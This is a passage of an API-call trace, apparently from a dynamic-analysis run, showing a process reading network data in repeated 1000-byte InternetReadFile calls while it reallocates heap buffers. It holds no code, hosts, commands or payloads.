lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33015a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33015a8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.414] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3301990, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3301990*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.414] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3301d78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3301d78*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.414] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3302160, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3302160*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.416] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3302548, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3302548*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.416] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3302930, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3302930*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.416] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3302d18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3302d18*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.417] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3303100, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3303100*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.417] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x25800) returned 0x32c0048 [0093.417] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x32e5858 | out: hHeap=0x1dc0000) returned 1 [0093.418] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ddcd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ddcd8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.418] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32de0c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32de0c0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.418] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32de4a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32de4a8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.418] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32de890, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32de890*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.418] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32dec78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32dec78*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.419] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32df060, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32df060*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.445] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32df448, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32df448*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.445] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32df830, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32df830*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32dfc18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32dfc18*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e0000, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e0000*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e03e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e03e8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e07d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e07d0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e0bb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e0bb8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e0fa0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e0fa0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1388, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1388*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1770, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1770*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.448] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1b58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1b58*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.448] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1f40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1f40*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.448] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e2328, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e2328*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e2710, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e2710*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e2af8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e2af8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e2ee0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e2ee0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e32c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e32c8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e36b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e36b0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e3a98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e3a98*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e3e80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e3e80*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4268, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4268*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4650, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4650*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4a38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4a38*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4e20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4e20*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.452] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e5208, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e5208*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.452] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x2d000) returned 0x32e5858 [0093.453] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x32c0048 | out: hHeap=0x1dc0000) returned 1 [0093.455] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330ae00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330ae00*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.455] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330b1e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330b1e8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.455] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330b5d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330b5d0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.456] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330b9b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330b9b8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.456] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330bda0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330bda0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.456] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330c188, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330c188*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.456] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330c570, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330c570*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.456] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330c958, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330c958*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.456] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330cd40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330cd40*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330d128, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330d128*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330d510, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330d510*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330d8f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330d8f8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330dce0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330dce0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330e0c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330e0c8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330e4b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330e4b0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330e898, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330e898*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330ec80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330ec80*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330f068, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330f068*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330f450, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330f450*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330f838, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330f838*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x330fc20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x330fc20*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3310008, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3310008*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33103f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33103f0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33107d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33107d8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3310bc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3310bc0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.459] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3310fa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3310fa8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.460] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3311390, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3311390*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.460] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3311778, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3311778*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.460] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3311b60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3311b60*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.460] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3311f48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3311f48*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.460] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3312330, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3312330*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.461] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x34800) returned 0x3312860 [0093.466] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x32e5858 | out: hHeap=0x1dc0000) returned 1 [0093.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x333f720, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x333f720*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x333fb08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x333fb08*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x333fef0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x333fef0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33402d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33402d8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.468] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33406c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33406c0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.468] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3340aa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3340aa8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.468] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3340e90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3340e90*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.469] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3341278, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3341278*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.469] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3341660, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3341660*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3341a48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3341a48*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3341e30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3341e30*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3342218, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3342218*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3342600, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3342600*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.476] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33429e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33429e8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.479] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3342dd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3342dd0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.479] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33431b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33431b8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.482] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33435a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33435a0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.482] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3343988, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3343988*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3343d70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3343d70*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3344158, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3344158*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3344540, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3344540*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3344928, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3344928*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3344d10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3344d10*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33450f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33450f8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33454e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33454e0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33458c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33458c8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3345cb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3345cb0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3346098, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3346098*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3346480, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3346480*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3346868, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3346868*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3346c50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3346c50*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.485] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x3c000) returned 0x32c0048 [0093.487] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x3312860 | out: hHeap=0x1dc0000) returned 1 [0093.487] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f4820, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f4820*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.487] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f4c08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f4c08*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.487] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f4ff0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f4ff0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.487] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f53d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f53d8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.487] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f57c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f57c0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f5ba8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f5ba8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) 